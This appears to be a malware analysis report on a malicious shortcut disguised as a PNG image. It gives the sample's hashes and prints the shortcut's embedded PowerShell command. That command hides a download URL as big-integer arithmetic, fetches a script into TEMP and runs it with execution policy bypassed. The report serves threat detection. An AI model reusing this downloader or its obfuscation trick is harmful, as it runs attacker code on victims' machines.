Infection Chain
Summary by MalvaGPT
Characteristics
Hash: Hash Value
MD5: 4a6053835b1d6c5f2aa4091f65f20699
SHA1: 971874e179c2814a999b76275813e7656486fe34
SHA256: 0ac143da7accb2fa62363146eebc676628d4095614f9d416fdb81ef456348d1c
SHA384: 9eed0918948ddf4f31803dbe0bf773fc32f29c58fd9c035fa443509b7254cbb826f51a246f3688500aeb7a658593cbe3
SHA512: 7339fd5245404a05583736b7bbc0a0c401a9108f15cfab8ebc54317af4bcbd86c673eb262a3594d038845e593026e2ad60107878275c991552e6fcceced0089e
SSDeep: 96:4/UqHbuaJVAk2hq/qn7mRw3hVIQWMw0AkmEY+FP4QHTlYL/I2iDmO54EnxCQWrQp:4/ZSaJV/qLxbJmkP4QxYISXEQQ0Qp
TLSH: CEE18E53E76FA526D9423D3851DCE85E4467D226ACE3C47FC52727562821187002AF79
Artefacts
Name: LNK: Command Execution
Value:

powershell.exe -ep bypass -c "$h=[bigint]\"177845265022739605218494539407119502495236530353767\";$a=[bigint]\"15033803975835653254346047739547794361893456465137\";$n=$h - $a;while($n -ne 0){$b+=[char]([int]($n -band 0xFF));$n=$n -shr 8};iwr $b -OutFile $env:TEMP\kXs6PztH.ps1 -UseBasicParsing; powershell -ep bypass -File $env:TEMP\kXs6PztH.ps1"

4a6053835b1d6c5f2aa4091f65f20699 (6.83 KB)
No malware configuration was found at this point.
Malicious

4a6053835b1d6c5f2aa4091f65f20699 > IMG-991743115.png.lnk
